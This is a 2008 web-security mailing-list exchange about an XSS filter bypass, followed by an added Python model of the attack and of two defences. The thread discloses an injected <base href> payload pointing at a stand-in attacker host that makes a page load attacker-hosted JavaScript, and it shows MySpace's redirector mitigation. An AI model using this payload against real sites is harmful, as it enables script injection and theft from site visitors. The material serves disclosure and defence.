Hi Arshan+list,

Indeed - the same vulnerability. I did google for it, but I didn't pick up your site (and RSnake's cheat sheet doesn't list it - now I know why).

Anyway - sorry. You deserve full credit for it, of course.

Thanks for the correction and the further information,
-Amit
On 7/16/08, Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx> wrote:

http://i8jesus.com/?p=10 (Jan 2008)

I also presented this vector last year at OWASP San Jose when I demo'ed AntiSamy as an example of dangerous content that isn't malicious code on its own. That's one of the selling points of AntiSamy – it stops not only XSS (well, we hope) but also prevents phishing attacks that abuse HTML/CSS.

I talked about it with RSnake afterwards and he had some crazy reason for not putting it on his cheatsheet – claimed it was too much like the <base href="javascript:foo();//"> vector. As noted on my blog post, IE7 is no longer (according to policy) supposed to be honoring <base> tags outside of <HEAD>, but FF is still vulnerable. You could use this to hijack anything – stylesheets (more XSS/phishing), images, scripts, etc. The only thing <base> won't help you steal as far as resources is anything gathered in JavaScript.

I think some of the big players had this figured out already (or more likely, just got really lucky). MySpace takes <base href> values, base64 encodes them, and redirects them through another domain. The flow is like this for them:

1. User puts in <base href="http://evil.com">
2. Str = base64("http://evil.com")
3. Profile = <base href="http://msplinks.com/redir?<base64encodedStr>">

Maybe there's a way to abuse that, but I don't think so. And eBay doesn't have any relative links after user content, at least when I first looked at this last year. They probably both just got lucky. =]

Arshan
---------- Previous message ----------
From: Amit Klein <aksecurity@xxxxxxxxx>
Date: Tue, Jul 15, 2008 at 7:33 AM
Subject: [WEB SECURITY] Nice little XSS trick
To: Web Security <websecurity@xxxxxxxxxxxxx>

Hi list

Recently I've been thinking about bypassing anti-XSS filters, and a nice little trick occurred to me, which I haven't seen anywhere (e.g. it's not on RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention BASE, but not the trick I describe here). The idea is to use the HTML BASE tag to force loading of JS code from the attacker's host. Consider a page with XSS vulnerability such as:

<html>
...
***XSS code may be embedded here***
...
<script src="/foo/bar.js"></script>
...
</html>

Now, an attacker can inject <base href="http://www.attacker.tld/">, and next thing you know, the browser (IE, at least) loads the JS from http://www.attacker.tld/foo/bar.js... And the beauty is that there's no "explicit" JS code involved in the payload itself.

Note that according to the HTML standard, BASE should be placed in the HEAD section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE). This is indeed observed by FF 2, but not by IE (checked IE6).

Thanks,
-Amit
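Added example, not code from either poster nor from AntiSamy or MySpace: a small Python model of the mechanism Amit describes (an injected <base href> re-targeting a page's relative <script src>) and of the two defences the thread mentions, dropping <base> from user-supplied markup as AntiSamy does, and rewriting its href through a redirector domain as in the MySpace flow Arshan outlines. Assumptions: the page URL http://www.example.com/profile and the page template are constructed for the demo; the resolver deliberately honours a <base> placed outside <head>, modelling the IE6 behaviour Amit reports (a browser following the HTML 4.01 rule would ignore it); the redirector prefix is the one quoted in Arshan's message; the stripper and rewriter are illustrative single-rule filters, not complete sanitizers.

```python
"""Model of <base href> hijacking of relative resources and two
neutralisations. Constructed example; page URL and template are made up."""
import base64
from html.parser import HTMLParser
from urllib.parse import urljoin


class BaseAwareResolver(HTMLParser):
    """Resolve every <script src> the way a browser that honours <base>
    anywhere in the document would (the IE6 behaviour reported in the
    thread). As in browsers, only the first <base href> counts."""

    def __init__(self, page_url):
        super().__init__()
        self.base = page_url        # document URL until a <base> is seen
        self.base_seen = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "base" and not self.base_seen and a.get("href"):
            self.base = urljoin(self.base, a["href"])
            self.base_seen = True
        elif tag == "script" and a.get("src"):
            self.scripts.append(urljoin(self.base, a["src"]))


def resolve_scripts(page_url, html):
    """Return the absolute URLs the page's <script src> attributes load from."""
    p = BaseAwareResolver(page_url)
    p.feed(html)
    p.close()
    return p.scripts


class BaseStripper(HTMLParser):
    """Illustrative AntiSamy-style rule: re-emit the markup with every
    <base> tag removed. Entities are passed through untouched."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag != "base":
            self.out.append(self.get_starttag_text())

    def handle_startendtag(self, tag, attrs):      # e.g. <base ... />
        if tag != "base":
            self.out.append(self.get_starttag_text())

    def handle_endtag(self, tag):
        if tag != "base":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")


class BaseRewriter(BaseStripper):
    """MySpace-style rule from the thread: keep the <base> tag but point its
    href at a redirector on another domain, carrying the original value
    base64-encoded. Relative links then resolve on the redirector host."""

    def __init__(self, redirector):
        super().__init__()
        self.redirector = redirector

    def handle_starttag(self, tag, attrs):
        if tag == "base":
            href = dict(attrs).get("href", "")
            token = base64.b64encode(href.encode()).decode()
            self.out.append(f'<base href="{self.redirector}{token}">')
        else:
            self.out.append(self.get_starttag_text())

    handle_startendtag = handle_starttag


def strip_base(user_html):
    p = BaseStripper()
    p.feed(user_html)
    p.close()
    return "".join(p.out)


def rewrite_base(user_html, redirector="http://msplinks.com/redir?"):
    p = BaseRewriter(redirector)
    p.feed(user_html)
    p.close()
    return "".join(p.out)


# Constructed page modelled on the vulnerable layout in Amit's post:
# user content is emitted before a relative <script src>.
PAGE_URL = "http://www.example.com/profile"
TEMPLATE = ('<html><body>{user}'
            '<script src="/foo/bar.js"></script></body></html>')
INJECTED = '<base href="http://www.attacker.tld/">'   # host from the post

if __name__ == "__main__":
    for label, user in [("clean", ""),
                        ("injected", INJECTED),
                        ("stripped", strip_base(INJECTED)),
                        ("rewritten", rewrite_base(INJECTED))]:
        print(f"{label:9} -> {resolve_scripts(PAGE_URL, TEMPLATE.format(user=user))}")
```

Running the script shows the untouched page loading /foo/bar.js from www.example.com, the injected page loading it from www.attacker.tld, and both filtered variants loading it from a host the attacker does not control (the original site after stripping, the redirector domain after rewriting). The rewrite works only because the redirector host serves nothing at the resolved paths; stripping is the simpler guarantee, which is why the thread treats the MySpace approach as lucky rather than deliberate.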